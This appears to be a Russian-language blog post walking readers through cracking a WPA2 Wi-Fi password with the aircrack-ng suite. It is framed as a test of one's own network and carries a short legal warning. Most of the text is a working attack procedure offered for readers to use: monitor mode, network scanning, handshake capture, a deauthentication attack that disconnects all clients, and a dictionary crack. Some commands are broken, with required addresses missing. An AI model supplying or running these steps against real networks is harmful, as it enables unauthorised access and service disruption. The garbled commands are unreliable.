Как я взломал свою Wi-Fi сеть за 10 минут (и ты сможешь)

19 марта 2026 (07:53:15)

Никакой магии, никакого хакерского кино. Только ноутбук, внешний Wi-Fi адаптер за 500 рублей и пара команд в терминале. WPA2 до сих пор живёт в каждой второй квартире, а большинство паролей — это просто слова из словаря. Проверил на своей сети — работает.


Что нужно:

🔴 Ноутбук с Linux или виртуалка

🔴 Wi-Fi адаптер с поддержкой monitor mode (Alfa AWUS036ACH — классика)

🔴 Установленный aircrack-ng (sudo apt install aircrack-ng)

🔴 Словарь паролей (rockyou.txt лежит в /usr/share/wordlists/)


Пошагово за 10 минут:


1. Включаем монитор-режим

   sudo airmon-ng start wlan0

   

   Интерфейс превращается в wlan0mon — теперь он видит весь эфир, а не только твою сеть .


2. Сканируем цели

   sudo airodump-ng wlan0mon

   

   На экране попрут все доступные сети. Находишь свою, записываешь BSSID (MAC-адрес точки) и канал (CH).


3. Ловим handshake

   sudo airodump-ng -c <канал> --bssid -w capture wlan0mon

   

   Теперь терминал висит и ждёт, пока кто-то подключится к сети. Но ждать можно вечность .


4. Форсируем переподключение (deauth attack)

   Открываешь второй терминал и отправляешь пакеты деаутентификации:

   sudo aireplay-ng --deauth 5 -a wlan0mon

   

   Это выкидывает всех клиентов из сети, они переподключаются автоматически — и в этот момент airodump-ng ловит заветный handshake . В первом терминале появится надпись WPA handshake: .


5. Взламываем пароль по словарю

   aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

   

   Если пароль был слабым — через пару секунд увидишь KEY FOUND! .


Важно:

🔴 Всё это легально только на своей сети. Чужие сети трогать — статья 272 УК РФ.

🟢 После эксперимента выключи монитор-режим:

   sudo airmon-ng stop wlan0mon

   sudo systemctl start NetworkManager

   


Вывод: 90% домашних сетей вскрываются за 10 минут, если пароль — не рандомная строка, а "qwerty123" или "password". Проверь свою — может, пора сменить?